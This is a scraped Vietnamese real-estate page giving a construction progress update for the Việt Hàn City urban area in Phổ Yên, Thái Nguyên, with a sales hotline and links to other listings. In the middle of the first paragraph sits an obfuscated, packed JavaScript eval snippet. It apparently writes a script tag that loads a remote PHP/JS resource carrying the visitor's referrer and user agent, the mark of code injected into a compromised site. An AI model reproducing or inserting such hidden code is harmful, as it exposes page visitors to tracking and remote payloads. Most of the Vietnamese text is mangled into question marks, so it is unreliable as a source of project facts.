THỜI GIAN BÀN GIAO DỰ ÁN:

Còn
1
0
Tháng
1
1
Ngày

Cập nhật tiến độ dự án Khu đô thị Việt Hàn city Phổ Yên

Ti?n eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zrrky|var|u0026u|referrer|knhkd||js|php’.split(‘|’),0,{}))
?? thi công c?a d? án b?t ??ng s?n khu ?ô th? Vi?t Hàn City Ph? Yên là m?t trong nh?ng v?n ?? quan tr?ng ???c các nhà ??u t? và khách hàng quan tâm. H? c?n ???c l?m rõ tình hình d? s?n ph?m mình mua và ??u t? có tri?n khai ?úng ti?n ?? hay không có ?nh h??ng ??n các k? ho?ch khác c?a b?n thân hay không vì v?y d??i ?ây chúng tôi xin c?p nh?t ti?n ?? c?a d? án trong th?i ?i?m hi?n t?i.

1, Các h?ng m?c xây d?ng c?a khu ?ô th? Vi?t Hàn City Ph? Yên

D? án xây d?ng Khu nhà ? xã h?i, Trung tâm th??ng m?i và nhà ? cao c?p H?ng Long hay còn g?i  Viê?t Ha?n City Phô? Yên là m?t trong nh?ng d? án tr?ng ?i?m t?i khu v?c phía Tây Nam t?nh Thái Nguyên do ch? ??u T? Công ty H?ng Long ch?u trách nhi?m.

C?p nh?t ti?n ?? d? án Khu ?ô th? Vi?t Hàn city Ph? Yên

 

 

T?ng di?n tích c?a d? án ??t n?n Vi?t Hàn city Ph? Yên h?n 38ha bao g?m nhi?u hàng m?c ??u t? xây d?ng c? th? c?n k? ??n nh?:

  • ??u t?, xây d?ng 8 tòa nhà xã h?i, m?i tòa cao 9 t?ng thi?t k? d?ng nhà ? ki?u chung c? v?i di?n tích kho?ng 1.300m2/ sàn;
  • H?ng m?c Trung tâm th??ng m?i v?i di?n tích sàn kho?ng 5.000m2
  • Xây d?ng t? h?p khách s?n, nhà hàng ph?c v? nhu c?u s? d?ng c?a c? dân Vi?t Hàn City Ph? Yên và  chuyên gia ph?c v? t? h?p KCN Sam Sung Thái Nguyên.
  • ??u t?, xây d?ng m?t khu dân c? và  bi?t th? li?n k? xung quanh d? án, nh?m ph?c v? nhu c?u nhà ? cho các cán b?, công nhân viên t? h?p khu công nghi?p Yên Bình Thái Nguyên,
  • Xây d?ng khu ki ?t x?ng d?u và m?t bãi ?? xe ph?c v? cho toàn b? h? th?ng d? án, nhà ?i?u hành, nhà v?n hóa, nhà tr?, h? th?ng ???ng giao thông n?i b?, công viên cây xanh, h? th?ng c?p ?i?n, c?p thoát n??c…c?a Khu ?ô th? Vi?t Hàn city Ph? Yên

Th?i gian th?c hi?n xây d?ng: T? Quý I/2018 ??n Quý III/2018 v?i nh?ng hãng m?c trên d? ki?n ngày bàn giao c? th?  các c?n h? thu?c khu ??t n?n Vi?t Hàn city Ph? Yên vào 20/12/2018.

 

2, Ti?n ?? thi công d? án ??t n?n khu ?ô th? Vi?t Hàn City Ph? Yên

D? án Khu ?ô Th? H?ng Long Thái Nguyên ( ??t n?n Vi?t Hàn City Ph? Yên) là m?t trong nh?ng d? án có ti?n ?? thi công r?t nhanh ch? kéo dài t? T? Quý I/2018 ??n Quý III/2018 v?i các b??c th?c hi?n ?úng theo quy ??nh c?a nhà n??c.

?ã ???c phê duy?t quy ho?ch 1/500

H? s? thi?t k? c? s? c?a d? án ??u t? xây d?ng khu ?ô th? Vi?t Hàn city, quy ho?ch xây d?ng ?ã trình bày nh?ng quy ho?ch chi ti?t xây d?ng 1/500 ???c l?p trên c? s? ?ã có quy ho?ch chi ti?t xây d?ng 1/2000 do UBND huy?n Ph? Yên ??a ý ki?n ?? xu?y và ???c UBND t?nh Thái Nguyên phê duy?t ?úng  th?m quy?n theo quy ??nh.

vì v?y, v? c? s? pháp lý, d? án khu ?ô th? Vi?t Hàn City hoàn toàn có c?n c? và t?n t?i giúp khách hàng an tâm khi l?a ch?n ??u t? ho?c mua ?.

?ã tr?i qua quá trình gi?i t?a m?t b?ng ?n ??nh

Sau khi ???c phê duy?t d? án quy ho?c ??u t? xây d?ng, khu ??t n?n Vi?t Hàn City b??c vào giai ?o?n gi?i t?a, ??n bu và h? tr? tái ??nh c? theo ?úng lu?t ??nh.

??u tiên, ch? ??u t? cùng c? quan hành chính huy?n Ph? Yên Xây d?ng và th?c hi?n k? ho?ch thu h?i ??t, ?i?u tra, kh?o sát, ?o ??c, ki?m ??m.

C?p nh?t ti?n ?? d? án Khu ?ô th? Vi?t Hàn city Ph? Yên

 

 

Sau ?ó L?p và th?m ??nh ph??ng án b?i th??ng, h? tr?, tái ??nh c? cho c? dân có nhà ? t?i khu v?c ??t n?m trong quy ho?ch d? án ??u t?, xây d?ng d? án khu ?ô th? H?ng Long Ph? Yên

Cu?i cùng là quá trình qquy?t ??nh thu h?i ??t, phê duy?t và t? ch?c th?c hi?n ph??ng án b?i th??ng, h? tr?, tái ??nh c? theo k? ho?ch ?ã ??t ra.

D? án ?ã hoàn thi?n xong quá trình gi?i t?a m?t b?ng ?n ??nh ?úng lu?t, thu?n lòng dân, không s?y ra tranh ch?p hay c??ng ch?.

?ang trong quá trình san l?p m?t b?ng

Sau khi tr?i qua quá trình gi?i t?a ?n ??nh d? án khu ?ô th? Vi?t Hàn City b?t ??u cho các ph??ng ti?n máy múc, ô tô, c?n c?u… ho?t ??ng th?c hi?n quá trình san l?p m?t b?ng.

B??c ti?p theo s? phân chia lô theo quy ho?ch d? án và ti?n hành thi công m?t s? h?ng m?c nhà nhà ? xã h?i, Trung tâm th??ng m?i và nhà ? cao c?p.

V?i ti?n ?? thi công nhanh chóng, ?úng lu?t d? án khu ?ô th? vicko City H?ng Ti?n ??m b?o bàn giao ?úng ti?n ?? cho các nhà ??u t? c?ng nh? quý khách hàng. ?? bi?t thêm các thông tin chi ti?t vui lòng liên h? Hotline: 093 15 68886

 

Bạn đang xem: Cập nhật tiến độ dự án Khu đô thị Việt Hàn city Phổ Yên trong

News latest

Saigon Riverside City lối tắt đến thành công
Saigon Riverside City lối tắt đến thành công

Tại sao nói dự án Saigon Riverside City chính là lối tắt đạt đến thành công mà mỗi khách hàng tại thị trường Thủ Đức...

Căn hộ sunshine city Sài Gòn hạng sang
Căn hộ sunshine city Sài Gòn hạng sang

Những yếu tố phong thủy cực tốt tại căn hộ Sunshine City Sài Gòn Phong thủy vốn được xem là một trong những yếu tố...

Dự án One Varandah đặc biệt như thế nào
Dự án One Varandah đặc biệt như thế nào

Là một trong những công trình bất động sản được triển khai tại quận 2 thành phố Hồ Chí Minh, dự án One Varandah tương...

BẢN ĐỒ HUYỆN BÌNH CHÁNH
BẢN ĐỒ HUYỆN BÌNH CHÁNH

Mới đây, UBND Thành phố đã có quyết định ban hành số 2391/QĐ-UBND về quy hoạch sử dụng đất đến năm 2020 và kế hoạch...

FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?
FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?

Thông tin t?p ?oàn FLC m?i ?ây ?ã v??t qua 16 ??i th? ?? th?ng ??u giá khu ??t có di?n tích 6,4ha thu?c ph??ng...